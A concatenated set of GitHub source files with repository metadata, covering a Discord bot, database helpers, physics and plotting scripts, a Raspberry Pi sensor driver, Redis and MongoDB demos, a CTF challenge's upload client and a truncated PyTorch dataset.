ctx.send(f'Got Gameweek: {gameweek}')\n user = await fpl.get_user(player_id)\n await ctx.send(f'Got {user}')\n picks = await user.get_picks(gameweek)\n team = await get_team_details(fpl, picks[gameweek])\n await 
ctx.send(team)\n\nbot.run(TOKEN)","repo_name":"spacedlevo/fpl_discord_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12263506945","text":"from collections import defaultdict\nfrom typing import Tuple, Any, Set, Union, List, TYPE_CHECKING\n\nimport sqlalchemy\nfrom sqlalchemy import MetaData\nfrom sqlalchemy.dialects import postgresql\n\nfrom alembic_postgresql_enum.sql_commands.column_default import get_column_default\n\nif TYPE_CHECKING:\n from sqlalchemy.engine import Connection\n\nfrom alembic_postgresql_enum.get_enum_data import DeclaredEnumValues, TableReference, ColumnType\n\n\ndef get_enum_values(enum_type: sqlalchemy.Enum) -> 'Tuple[str, ...]':\n # For specific case when types.TypeDecorator is used\n if isinstance(enum_type, sqlalchemy.types.TypeDecorator):\n dialect = postgresql.dialect\n\n def value_processor(value):\n return enum_type.process_bind_param(\n enum_type.impl.result_processor(dialect, enum_type)(value),\n dialect\n )\n else:\n def value_processor(enum_value):\n return enum_value\n return tuple(value_processor(value) for value in enum_type.enums)\n\n\ndef column_type_is_enum(column_type: Any) -> bool:\n if isinstance(column_type, sqlalchemy.Enum):\n return column_type.native_enum\n\n # For specific case when types.TypeDecorator is used\n if isinstance(getattr(column_type, 'impl', None), sqlalchemy.Enum):\n return True\n\n return False\n\n\ndef get_declared_enums(metadata: Union[MetaData, List[MetaData]],\n schema: str,\n default_schema: str,\n connection: 'Connection',\n ) -> DeclaredEnumValues:\n \"\"\"\n Return a dict mapping SQLAlchemy declared enumeration types to the set of their values\n with columns where enums are used.\n :param metadata:\n SqlAlchemy schema\n :param str schema:\n Schema name (e.g. 
\"public\").\n :param default_schema:\n Default schema name, likely will be \"public\"\n :param connection:\n Database connection\n :returns DeclaredEnumValues:\n enum_values: {\n \"my_enum\": tuple([\"a\", \"b\", \"c\"]),\n },\n enum_table_references: {\n \"my_enum\": {\n EnumToTable(table_name=\"my_table\", column_name=\"my_column\")\n }\n }\n \"\"\"\n enum_name_to_values = dict()\n enum_name_to_table_references: defaultdict[str, Set[TableReference]] = defaultdict(set)\n\n if isinstance(metadata, list):\n metadata_list = metadata\n else:\n metadata_list = [metadata]\n\n for metadata in metadata_list:\n for table in metadata.tables.values():\n for column in table.columns:\n column_type = column.type\n column_type_wrapper = ColumnType.COMMON\n\n # if column is array of enums\n if isinstance(column_type, sqlalchemy.ARRAY):\n column_type = column_type.item_type\n column_type_wrapper = ColumnType.ARRAY\n\n if not column_type_is_enum(column_type):\n continue\n\n column_type_schema = column_type.schema or default_schema\n if column_type_schema != schema:\n continue\n\n if column_type.name not in enum_name_to_values:\n enum_name_to_values[column_type.name] = get_enum_values(column_type)\n\n column_default = get_column_default(connection, schema, table.name, column.name)\n enum_name_to_table_references[column_type.name].add(\n TableReference(table.name, column.name, column_type_wrapper, column_default)\n )\n\n return DeclaredEnumValues(\n enum_values=enum_name_to_values,\n enum_table_references={enum_name: frozenset(table_references)\n for enum_name, table_references\n in enum_name_to_table_references.items()},\n )\n","repo_name":"Pogchamp-company/alembic-postgresql-enum","sub_path":"alembic_postgresql_enum/get_enum_data/declared_enums.py","file_name":"declared_enums.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"53"} +{"seq_id":"37738955511","text":"# IMPORTS\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Definição das constantes do exc\nS1 = 1\nS2 = 0.99\nS3 = 0.5\nK = 200 # Número de divisões do espaço livre\nN1 = int(K/S1) # Número de divisões do tempo\nN2 = int(K/S2) # Número de divisões do tempo\nN3 = int(K/S3) # Número de divisões do tempo\nNd1 = int(160/S1) # N desejado para fazer o plot\nNd2 = int(160/S2) # N desejado para fazer o plot\nNd3 = int(160/S3) # N desejado para fazer o plot\n\n\ndef func(n, S):\n if n > 40/S:\n return 0\n else:\n return 1\n\n\ndef calcWavef(U, S, N):\n # Definição dos valores iniciais\n for n in range(0, N):\n U[n, 0] = func(n, S)\n\n for i in range(0, K):\n U[0, i] = 0\n\n for n in range(1, N-1):\n for i in range(1, K):\n U[n+1, i] = (S**2)*(U[n, i+1] - 2*U[n, i] +\n U[n, i-1]) + 2*U[n, i] - U[n-1, i]\n return U\n\n\n# SCRIPT PRINCIPAL\nU1 = np.zeros((N1, K+1)) # Função de onda U1 no tempo n, no espaço i\nU2 = np.zeros((N2, K+1)) # Função de onda U no tempo n, no espaço i\nU3 = np.zeros((N3, K+1)) # Função de onda U no tempo n, no espaço i\ngI = np.arange(0, K, 1)\nfig, ax = plt.subplots(1, 3, sharey=True)\n\nU1 = calcWavef(U1, S1, N1)\nax[0].plot(gI, U1[Nd1, gI])\nax[0].grid(True)\nax[0].set_title(\"Wavefunction para S = \" + str(S1))\nax[0].set_ylabel(\"Wavefunction U(i)\")\nax[0].set_xlabel(\"Coordenada i do grid\")\n\nU2 = calcWavef(U2, S2, N2)\nax[1].plot(gI, U2[Nd2, gI], color='orange')\nax[1].grid(True)\nax[1].set_title(\"Wavefunction para S = \" + str(S2))\nax[1].set_ylabel(\"Wavefunction U(i)\")\nax[1].set_xlabel(\"Coordenada i do grid\")\n\nU3 = 
calcWavef(U3, S3, N3)\nax[2].plot(gI, U3[Nd3, gI], color='purple')\nax[2].grid(True)\nax[2].set_title(\"Wavefunction para S = \" + str(S3))\nax[2].set_ylabel(\"Wavefunction U(i)\")\nax[2].set_xlabel(\"Coordenada i do grid\")\n\nplt.show()\n","repo_name":"RodrigoValeretto/Trabalhos-Ondas","sub_path":"Trab2-Ondas/exc2.7.py","file_name":"exc2.7.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37857883104","text":"#!/usr/bin/env python3\nimport socket\nimport sys\nimport time\n\n# Read from the socket until a string is reached\ndef read_until(s, end, drop = False):\n if isinstance(end, str):\n end = end.encode()\n\n c = s.recv(1)\n data = c\n\n while data[-len(end) :] != end:\n c = s.recv(1)\n data += c\n \n if drop:\n # Remove token string we were looking for from the output\n data = data[: -len(end)]\n \n return data.decode()\n\n\n# Read a line from the socket\ndef readline(s, drop = False):\n return read_until(s, \"\\n\")\n\n\nif len(sys.argv) != 5:\n print(f\"Usage: {sys.argv[0]} SERVER_IP SERVER_PORT SOURCE_FILE OUTPUT_FILE\", file = sys.stderr)\n sys.exit(1)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1], int(sys.argv[2])))\n\nwith open(sys.argv[3], \"rb\") as f:\n source = f.read()\n\nsource_length = len(source)\n\n# Time string\nreadline(s)\n\n# File size prompt\nread_until(s, \": \")\n\n# Send file size. The \\n is important!\ns.send(f\"{source_length}\\n\".encode())\n\n# Make sure to wait for the server to be ready to receive input, then send Python source code\ntime.sleep(0.1)\ns.send(source)\n\n# Compiled obfuscated python source\ncompiled = s.recv(4096)\n\nwith open(sys.argv[4], \"wb\") as f:\n f.write(compiled)","repo_name":"UnitedCTF/UnitedCTF-2019","sub_path":"challenges/pwn/python-obfuscator/codec/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"22479613152","text":"#!/usr/bin/python\n#coding=utf-8\n#注意本程序是python3!!!\nimport RPi.GPIO as GPIO\nimport time\nfrom ctypes import *\nimport os\n#本来准备调用C语言实现的微秒级定时器,但还是有很大问题。。。\nlibc = cdll.LoadLibrary(os.getcwd() + \"/libc.so\")\n\n'''\nBOARD方式第2引脚(5V)接到传感器正极\nBOARD方式第14引脚(0V)接到传感器负极\nBOARD方式第16引脚(GPIO.4, BCM方式编号23,wPi方式编号4)输入,从传感器OUT读取数据\n2+----------5K R------------|\n16<-------------------------|\n2+---------------------+SENSER-|\n14-----------------------------|\n'''\n\n#存放时序数据\ndata = [0 for i in range(40)]\n\ndef driver():\n\tj = 0\n\t# 传感器上电后,要等待1s以越过不稳定状态\n\tGPIO.setmode(GPIO.BOARD)\n\ttime.sleep(1)\n\t# 先向传感器发送开始信号,握手-LOW-\n\tGPIO.setup(16, GPIO.OUT)\n\tGPIO.output(16, GPIO.LOW)\n\t# 主机把总线拉低必须大于18毫秒,这里采用20毫秒\n\ttime.sleep(0.02)\n\t# 然后主机拉高并延时等待传感器的响应\n\tGPIO.output(16, GPIO.HIGH)\n\ti = 1\n\ti = 1\n\ti = 1\n\ti = 1\n\t# 等待传感器的握手响应信号和数据信号\n\tGPIO.setup(16, GPIO.IN)\n\twhile GPIO.input(16) == 1:\n\t\tcontinue\n\t# 总线为低电平,说明传感器发送响应信号,80us低电平\n\twhile GPIO.input(16) == 0:\n\t\tcontinue\n\t# 然后传感器再把总线拉高80us,然后才准备发送数据\n\twhile GPIO.input(16) == 1:\n\t\tcontinue\n\t# 开始发送数据\n\t# 一次完整的数据为40bit,高位先出 \n\t# 8bit湿度整数数据+8bit湿度小数数据+8bit温度整数数据+8bit温度小数数据+8bit校验和\n\twhile j < 40:\n\t\tk = 0\n\t\t#每一位的起始信号,都以50us低电平开始\n\t\twhile GPIO.input(16) == 0:\n\t\t\tcontinue\n\t\t#每一位的数值信号,高电平的长短决定了数据位是0还是1。\n\t\twhile GPIO.input(16) == 1:\n\t\t\t#需要知道每次循环的耗时,才能知道k < x是表示0\n\t\t\tk += 1\n\t\t\tif k > 100:\n\t\t\t\tbreak\n\t\t# 高电平持续26-28us表示0, 高电平持续70us表示1\n\t\tif k < 
3:\n\t\t\tdata[j] = 0\n\t\telse:\n\t\t\tdata[j] = 1\n\t\tj += 1\n\tprint(data)\n\ndef compute():\n\thumidity_bit = data[0:8]\n\thumidity_point_bit = data[8:16]\n\ttemperature_bit = data[16:24]\n\ttemperature_point_bit = data[24:32]\n\tcheck_bit = data[32:40]\n\thumidity = 0\n\thumidity_point = 0\n\ttemperature = 0\n\ttemperature_point = 0\n\tcheck = 0\n\tfor i in range(8):\n\t\thumidity += humidity_bit[i] * 2**(7-i)\n\t\thumidity_point += humidity_point_bit[i] * 2**(7-i)\n\t\ttemperature += temperature_bit[i] * 2**(7-i)\n\t\ttemperature_point += temperature_point_bit[i] * 2**(7-i)\n\t\tcheck += check_bit[i] * 2**(7-i)\n\t# renamed from \"sum\" to avoid shadowing the built-in\n\ttotal = humidity + humidity_point + temperature + temperature_point\n\tif check == total:\n\t\tprint(\"temperature:\", temperature, \", humidity:\", humidity)\n\telse:\n\t\tprint(\"wrong!\", check, \"!=\", total)\n\nif __name__ == \"__main__\":\n\tdriver()\n\tcompute()\n\tGPIO.cleanup()\n\n","repo_name":"hustlbj/raspberry","sub_path":"py_scripts/dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"10260882649","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: redis_pubsub_demo.py\n# Author: lxw\n# Date: 9/28/17 2:58 PM\n\"\"\"\nReferences:\n[Using Python to implement Redis subscriptions](http://www.cnblogs.com/anpengapple/p/7027979.html)\n[Quickly building a publish-subscribe system with Redis (python3x)](http://blog.csdn.net/drdairen/article/details/51659061)\n[A short script exploring Redis pubsub functions in Python](https://gist.github.com/lxw0109/ee6b578a454f5d17e0d1adc3219b8a21)\n\nNOTE: run the subscriber before the publisher: if a message has no subscriber it disappears from the Redis server (so start the subscriber first, then start the publisher).\n\"\"\"\n\nimport redis\nimport threading\n\n# Be careful to check the message type: as soon as you listen() you receive a message, but it comes from the system rather than a publisher; its content is {'pattern': None, 'type': 'subscribe', 'channel': 'spub', 'data': 1L}, meaning the subscription succeeded on channel 'spub' and there is currently one subscriber.\n\nclass RedisSubscriber(threading.Thread): # Listener\n    \"\"\"\n    Helper class for subscribing to Redis channels\n    \"\"\"\n    def __init__(self, redis_conn, channels):\n        threading.Thread.__init__(self)\n        self.redis = redis_conn\n        self.pubsub = self.redis.pubsub()\n        self.pubsub.psubscribe(channels) # use psubscribe to subscribe to several channels at once\n\n    def work(self, item):\n        print(\"Channel:{0}, data:{1}\".format(item[\"channel\"], item[\"data\"]))\n\n    def run(self):\n        for item in self.pubsub.listen():\n            if item[\"data\"] == \"KILL\":\n                self.pubsub.unsubscribe()\n                print(\"{0}, unsubscribed and finished\".format(self))\n                break\n            else:\n                self.work(item)\n\n\ndef main():\n    pool = redis.ConnectionPool(host=\"192.168.1.41\", port=6379, db=0)\n    redis_conn = redis.Redis(connection_pool=pool)\n    client = RedisSubscriber(redis_conn, [\"channel1\", \"channel2\"])\n    client.start()\n\n    redis_conn.publish(\"channel1\", \"lxw: this will reach the subscriber.\")\n    redis_conn.publish(\"channel123\", \"lxw: this will NOT reach the subscriber.\")\n    redis_conn.publish(\"channel2\", \"lxw: this will reach the subscriber.\")\n    redis_conn.publish(\"channel2\", \"KILL\")\n    redis_conn.publish(\"channel1\", \"KILL\")\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"lxw0109/Python_Demos","sub_path":"redis_pubsub_demo/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"32827610004","text":"# importing the module\nfrom pymongo import MongoClient\n\n# creating a MongoClient object\nclient = 
MongoClient() \n \n# connecting with the portnumber and host \nclient = MongoClient('localhost', 27017)\n \n# accessing the database \ndatabase = client['BDD'] \n \n# access collection of the database \ncollection = database['world'] \n\ndef QST1(): # Déterminer le nombre exact de pays \n return len(collection.distinct(\"Name\")) #or return collection.distinct(\"Name\").length\n\ndef QST2(): # Lister les différents continents \n return collection.distinct(\"Continent\")\n\ndef QST3(): # Lister les informations de l’Algérie\n return collection.find_one({\"Name\":\"Algeria\"})\n\ndef QST4(): # Lister les pays du continent Africain, ayant une population inférieure à 100000 habitants\n countries = []\n for post in (collection.find({\"Continent\":\"Africa\", \"Population\":{\"$lt\": 100000}},{\"Name\" :1}).sort(\"Name\")):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST5(): # Lister les pays indépendant du continent océanique \n countries = []\n for post in (collection.find({\"Continent\":\"Oceania\", \"IndepYear\":{\"$ne\": \"NA\"}},{\"Name\" :1}).sort(\"Name\")):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST6(): # Quel est le plus gros continent en termes de surface ? (un seul continent affiché à la fin) \n countries = []\n for post in (collection.find().sort(\"SurfaceArea\", -1).limit(1)):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST7(): # Donner par continents le nombre de pays, la population totale et en bonus le nombre de pays indépendant. \n continents_infos = {}\n for post in collection.distinct(\"Continent\"):\n continent_infos = {}\n count = collection.count_documents({\"Continent\":post})\n count_indi = collection.count_documents({\"Continent\":post, \"IndepYear\":{\"$ne\": \"NA\"}})\n continent_infos[\"Number of countries\"] = count\n continent_infos[\"Size of the population\"] = 0\n continent_infos[\"Number of independent countries\"] = count_indi\n continents_infos[post] = continent_infos\n\n pipe = [{'$group': {'_id': \"$Continent\", 'total': {'$sum': '$Population'}}}]\n for post in collection.aggregate(pipeline=pipe):\n continents_infos[post[\"_id\"]][\"Size of the population\"] = post[\"total\"]\n\n return continents_infos\n\ndef QST8(): # Donner la population totale des villes d’Algérie \n n = collection.find_one({\"Name\":\"Algeria\"})[\"Cities\"]\n count = sum(map(lambda x: int(x['Population']), n))\n\n return count\n\ndef QST9(): # 9. Donner la capitale (uniquement nom de la ville et population) d’Algérie \n capital = collection.find_one({\"Name\": \"Algeria\"})[\"Capital\"]\n keys = [\"Name\", \"Population\"]\n capital_info = [capital[key] for key in keys]\n return capital_info\n\ndef QST10(): # 10. Quelles sont les langues parlées dans plus de 15 pays ? \n '''\n db.world.aggregate([\n {\n $addFields: { Langue : {$concatArrays: [\"$OffLang\",\"$NotOffLang\" ] } }\n },\n {$unwind: \"$Langue\"\n },\n { $group: {\n _id:\"$Langue.Language\",\n \"nb\" : {$sum :1} \n }\n },\n { $match: { \"nb\": { $gt: 15 } } }\n ])\n\n '''\n languages = []\n pipe = [{'$addFields': { \"Langue\" : {'$concatArrays': [\"$OffLang\",\"$NotOffLang\" ] } }},{'$unwind': \"$Langue\"},{'$group': { \"_id\":\"$Langue.Language\", \"Number of Countries\" : {'$sum' :1}}}, { '$match': { \"nb\": { '$gt': 15 } } }]\n\n for post in collection.aggregate(pipeline=pipe):\n languages.append(post)\n return languages\n\n\ndef QST11(): # 11. 
Calculer pour chaque pays le nombre de villes (pour les pays ayant au moins 100 villes), en les triant par ordre décroissant du nombre de villes\n '''\n db.world.aggregate([\n { \n $addFields: { villes : {$size: { \"$ifNull\": [ \"$Cities\", [] ] } } }\n }, \n {\n $match: {\n villes: { $gt: 100 }\n }\n },\n { $sort: {\"villes\":-1} },\n {\n $project: {\n _id: \"$Name\",\n \"Number of Cities\" :\"$villes\"\n }\n }\n])\n '''\n pays = []\n pipe = [{ '$addFields': { \"villes\" : {'$size': { \"$ifNull\": [ \"$Cities\", [] ] } } }}, {'$match': {\"villes\": { '$gt': 100 }}},{ '$sort': {\"villes\":-1} },{'$project': {\"_id\": \"$Name\",\"Number of Cities\" :\"$villes\"}}]\n for post in collection.aggregate(pipeline=pipe):\n pays.append(post)\n return pays\n\ndef QST12(): # 12. Lister les 10 villes les plus habitées, ainsi que leur pays, dans l’ordre décroissant de la population\n '''\n db.world.aggregate([\n {$unwind: \"$Cities\"\n },\n {$sort: {\"Cities.Population\":-1} },\n { $limit : 10 },\n {$sort: {\"Cities.Population\":1} },\n {\n $project: {\n _id:\"$Cities.Name\",\n \"Country\":\"$Name\",\n \"City Population\":\"$Cities.Population\"\n }\n }\n ])\n '''\n villes = []\n pipe = [{'$unwind': \"$Cities\"},{'$sort': {\"Cities.Population\":-1} },{ '$limit' : 10 },{'$sort': {\"Cities.Population\":1} },{'$project': { \"_id\":\"$Cities.Name\",\"Country\":\"$Name\",\"City Population\":\"$Cities.Population\"}}]\n for post in collection.aggregate(pipeline=pipe):\n villes.append(post)\n return villes\n\ndef QST13(): # 13. Lister les pays pour lesquels l’Arabe est une langue officielle \n '''\n db.world.find({\"OffLang.Language\":{$eq:\"Arabic\"}},{\"Name\":1})\n '''\n countries =[]\n for post in (collection.find({\"OffLang.Language\":{'$eq':\"Arabic\"}},{\"Name\":1})):\n countries.append(post[\"Name\"])\n return countries\n\ndef QST14(): # 14. Lister les 5 pays avec le plus de langues parlées \n '''\n db.world.aggregate([\n {\n $addFields: { c : {$concatArrays: [\"$OffLang\",\"$NotOffLang\" ] } }\n },\n { \n $addFields: { langs : {$size: { \"$ifNull\": [ \"$c\", [] ] } } }\n \n }, \n { \n $sort: {\"langs\":-1} \n },\n { $limit : 5 },\n {\n $group: {\n _id:\"$Name\"\n }\n }\n])\n'''\n countries =[]\n pipe = [ {'$addFields': { \"c\" : {'$concatArrays': [\"$OffLang\",\"$NotOffLang\" ] } }},{ '$addFields': { \"langs\" : {'$size': { \"$ifNull\": [ \"$c\", [] ] } } }},{ '$sort': {\"langs\":-1} },{ '$limit' : 5 },{'$group': {\"_id\":\"$Name\"}}]\n\n for post in collection.aggregate(pipeline=pipe):\n countries.append(post[\"_id\"])\n return countries\n\ndef QST15(): # 15. Lister les pays pour lesquels la somme des populations des villes est supérieure à la population du pays. 
\n '''\n db.world.aggregate([\n {\n $addFields: { somme : {$sum: \"$Cities.Population\"} } \n },\n {\n $addFields:{comp : {$cmp: ['$somme','$Population']}}\n },\n {$match: {comp:{$gt:1}}},\n {\n $project: {\n _id:\"$Name\",\n \"Total Cities Population\":\"$somme\",\n \"Country Population\":\"$Population\"\n }\n }\n])\n '''\n countries =[]\n pipe = [ {\n '$addFields': { \"somme\" : {'$sum': \"$Cities.Population\"} } \n },\n {\n '$addFields':{\"comp\" : {'$cmp': ['$somme','$Population']}}\n },\n {'$match': {\"comp\":{'$gt':1}}},\n {\n '$project': {\n \"_id\":\"$Name\",\n \"Total Cities Population\":\"$somme\",\n \"Country Population\":\"$Population\"\n }\n }]\n\n for post in collection.aggregate(pipeline=pipe):\n countries.append(post[\"_id\"])\n\n return countries\n\n\n\n\n","repo_name":"IliesChibane/Projet-BDA","sub_path":"Projet-BDA/DBrequests.py","file_name":"DBrequests.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9363934363","text":"from lineup import LineUp\nfrom fielder import Fielder\nfrom ball_in_play import BallInPlay\nfrom constants import DEFAULT_INTERVAL_MS\nfrom constants import DEFAULT_FIELDER_HEIGHT\nfrom src.coordinates import CartesianCoordinate\n\n\nclass CatchCalculator:\n def __init__(self):\n pass\n\n @staticmethod\n def calculate_out_fielder(fielder: Fielder, ball_in_play: BallInPlay, flight_path: list[CartesianCoordinate]) \\\n -> [bool, list[CartesianCoordinate]]:\n radii = fielder.get_radii()\n out = False\n intersections = []\n for t in range(len(ball_in_play.path)):\n ball = ball_in_play.path[t]\n if 0 < ball.z < DEFAULT_FIELDER_HEIGHT \\\n and fielder.coordinates_cartesian.x - radii[t][0] < ball.x < fielder.coordinates_cartesian.x + radii[t][0] \\\n and fielder.coordinates_cartesian.y - radii[t][0] < ball.y < fielder.coordinates_cartesian.y + radii[t][0]:\n out = True\n intersections.append(ball)\n ball_in_play.caught = out\n return out, intersections\n\n @staticmethod\n def calculate_out_lineup(lineup: LineUp, flight_path: list[CartesianCoordinate]) -> [bool, list[(str, CartesianCoordinate)]]:\n out = False\n intersections = []\n for fielder in lineup.fielders:\n caught, positions = CatchCalculator.calculate_out_fielder(fielder, flight_path)\n if caught:\n out = True\n intersections.append((fielder.name, positions))\n return out, intersections, flight_path\n\n @staticmethod\n def calculate_multiple(lineup: LineUp, balls_in_play: list[BallInPlay]) \\\n -> list[[bool, list[(str, CartesianCoordinate)], list[CartesianCoordinate]]]:\n return_value = []\n for ball in balls_in_play:\n return_value.append(CatchCalculator.calculate_out_lineup(lineup, ball.path))\n return return_value\n\n\nif __name__ == '__main__':\n ball_in_play = BallInPlay(10, 0, 0, 2)\n balls = []\n for height in range(3):\n balls.append(BallInPlay(10, 0, 0, height))\n # print(ball_in_play.path_3d())\n # fielder = Fielder(CartesianCoordinate(2, 0, 0))\n # print(fielder)\n # print(CatchCalculator.calculate_out_fielder(fielder, ball_in_play))\n fielders = []\n for distance in range(3):\n fielders.append(Fielder(CartesianCoordinate(distance, 0, 0), False))\n lineup = LineUp(fielders)\n # print(CatchCalculator.calculate_out_lineup(lineup, ball_in_play.path_3d()))\n calc_multiple_result = CatchCalculator.calculate_multiple(lineup, balls)\n caught = False\n for result in calc_multiple_result:\n if result[0]:\n caught = True\n break\n print(caught)\n 
print(calc_multiple_result)\n\n\n","repo_name":"codingaudrey/SoftBallStrategeSimulator","sub_path":"src/catch_calculator.py","file_name":"catch_calculator.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74271650409","text":"from django import forms\nfrom pedagogy.models import Cursus, StudyPeriod, Subject, SubjectModality\n\n\nclass CursusForm(forms.ModelForm):\n    start_date = forms.DateField(\n        widget=forms.DateInput(attrs={'class':'datepicker'})\n    )\n    \n    class Meta:\n        model = Cursus\n\nclass StudyPeriodForm(forms.ModelForm):\n    start_date = forms.DateField(\n        widget=forms.DateInput(attrs={'class':'datepicker'})\n    )\n    end_date = forms.DateField(\n        widget=forms.DateInput(attrs={'class':'datepicker'})\n    )\n    class Meta:\n        model = StudyPeriod\n\nclass SubjectForm(forms.ModelForm):\n    name = forms.CharField()\n    study_period = forms.ModelChoiceField(queryset=StudyPeriod.objects.all())\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Override the default init method to add as many subject\n        modality fields as needed.\n\n        \"\"\"\n        super(SubjectForm, self).__init__(*args, **kwargs)\n        for (modality_name, real_name) in SubjectModality.TYPE_CHOICES:\n            self.fields[modality_name] = forms.CharField(required=False)\n\n    def save(self, *args, **kwargs):\n        \"\"\"Save the form and create the subject modality objects\n        \n        \"\"\"\n        subject = super(SubjectForm, self).save(*args, **kwargs)\n        for (modality, null) in SubjectModality.TYPE_CHOICES:\n            if self.cleaned_data[modality] != '':\n                sm = SubjectModality(\n                    planned_hours=self.cleaned_data[modality],\n                    subject = subject,\n                    type = modality\n                )\n                sm.save()\n        return subject\n\n    class Meta:\n        model = Subject\n","repo_name":"easytimetable/easytimetable","sub_path":"easytimetable/pedagogy/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
{"seq_id":"25410279323","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\nimport math\nfrom matplotlib import ticker\n\nfig = plt.figure()\nax = plt.axes()\n\n# Error covariance matrices for problem 1\n# sigmap = np.array([[2.5,1.5],[1.5,2.5]])\n# sigmap_offset=(20.0,5.0)\n# sigmaf = np.array([[13.0/7.0,3.0/7.0],[3.0/7.0,5.0/7.0]])\n# sigmaf_offset=(26.0,15.0)\n# sigmas = np.array([[0.0,0.0],[0.0,1.0]])\n# sigmas_offset=(23.0,24.0)\n\n\n# Error covariance matrices for problem 2\nsigmap = np.array([[2.5,1.5],[1.5,2.5]])\nsigmap_offset=(20.0,5.0)\nsigmaf = np.array([[5.0/2.0,3.0/2.0],[3.0/2.0,5.0/2.0]])\nsigmaf_offset=(20.0,5.0)\n\n# Compute the eigenvalues and eigenvectors\nsigmap_eigenval, sigmap_eigenvec = np.linalg.eig(sigmap)\nsigmap_rad = np.arctan2(sigmap_eigenvec[1][0], sigmap_eigenvec[0][0])\nsigmaf_eigenval, sigmaf_eigenvec = np.linalg.eig(sigmaf)\nsigmaf_rad = np.arctan2(sigmaf_eigenvec[1][0], sigmaf_eigenvec[0][0])\n# sigmas_eigenval, sigmas_eigenvec = np.linalg.eig(sigmas)\n# sigmas_rad = np.arctan2(sigmas_eigenvec[1][0], sigmas_eigenvec[0][0])\n\n#print(sigmaf_rad)\n# print(sigmap_eigenval)\n# print(sigmap_eigenvec)\n# print(sigmaf_eigenval)\n# print(sigmaf_eigenvec)\n\n# Generate the ellipses\n# sigmap_ell = patches.Ellipse(xy=sigmap_offset, width=2*sigmap_eigenval[0], height=2*sigmap_eigenval[1], angle=math.degrees(sigmap_rad), fc='b', ec='y', fill=False, label='sigma_p' )\n# sigmaf_ell = patches.Ellipse(xy=sigmaf_offset, width=2*sigmaf_eigenval[0], 
height=2*sigmaf_eigenval[1], angle=math.degrees(sigmaf_rad), fc='b', ec='b', fill=False, label='sigma_f')\n\nsigmap_ell = patches.Ellipse(xy=sigmap_offset, width=2*math.sqrt(sigmap_eigenval[0]), height=2*math.sqrt(sigmap_eigenval[1]), angle=math.degrees(sigmap_rad), fc='b', ec='y', fill=False, label='sigma_p' )\nsigmaf_ell = patches.Ellipse(xy=sigmaf_offset, width=2*math.sqrt(sigmaf_eigenval[0]), height=2*math.sqrt(sigmaf_eigenval[1]), angle=math.degrees(sigmaf_rad), fc='b', ec='b', fill=False, label='sigma_f')\n# sigmas_ell = patches.Ellipse(xy=sigmas_offset, width=1000.0, height=2.0, angle=0.0, fc='b', ec='g', fill=False, label='sigma_s')\n\nax.add_patch(sigmap_ell)\nax.add_patch(sigmaf_ell)\n# ax.add_patch(sigmas_ell)\n\nplt.axis('scaled')\nax.set_aspect('equal')\nax.grid(which='major', color='k', linestyle='--', linewidth=1)\n\n# ax.set_xlim(18, 28)\n# ax.set_ylim(0, 26)\nax.yaxis.set_major_locator(ticker.MultipleLocator(1.0)) # 1.0ごと\nplt.xlabel('x[cm]')\nplt.ylabel('y[cm]')\nplt.legend(loc='lower right')\nplt.show()\n\n\n","repo_name":"g104robo/error_ellipse","sub_path":"error_ellipse.py","file_name":"error_ellipse.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73689901288","text":"from __future__ import print_function, division\nimport os\nimport math\nimport glob\nimport shutil\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nfrom metrics import smape\nfrom model import Dual_efficientnet\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, models\nfrom torch import nn, optim\nfrom torchvision.transforms.functional import to_pil_image\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass StageDataset(Dataset):\n def __init__(self, excel_file, sheet_name, root_dir, data_info, transform=None):\n self.se_map_values = pd.read_excel(\n excel_file, sheet_name=sheet_name, \n ) # Load the SE map values from an Excel file nrows=181\n self.root_dir = root_dir\n self.records = pd.read_excel(\n data_info, sheet_name=sheet_name, \n ) # Load the records from an Excel file\n self.transform = transform\n self.image_slices = self.load_image_slices() # Load the image slices\n\n def get_numeric_prefix(self, filename):\n numeric_prefix = \"\"\n for char in filename:\n if char.isdigit():\n numeric_prefix += char\n else:\n break\n return int(numeric_prefix)\n\n def load_image_slices(self):\n image_slices = []\n for idx in range(len(self.se_map_values)):\n img_folder_name = str(idx).zfill(\n 4\n ) # Format the 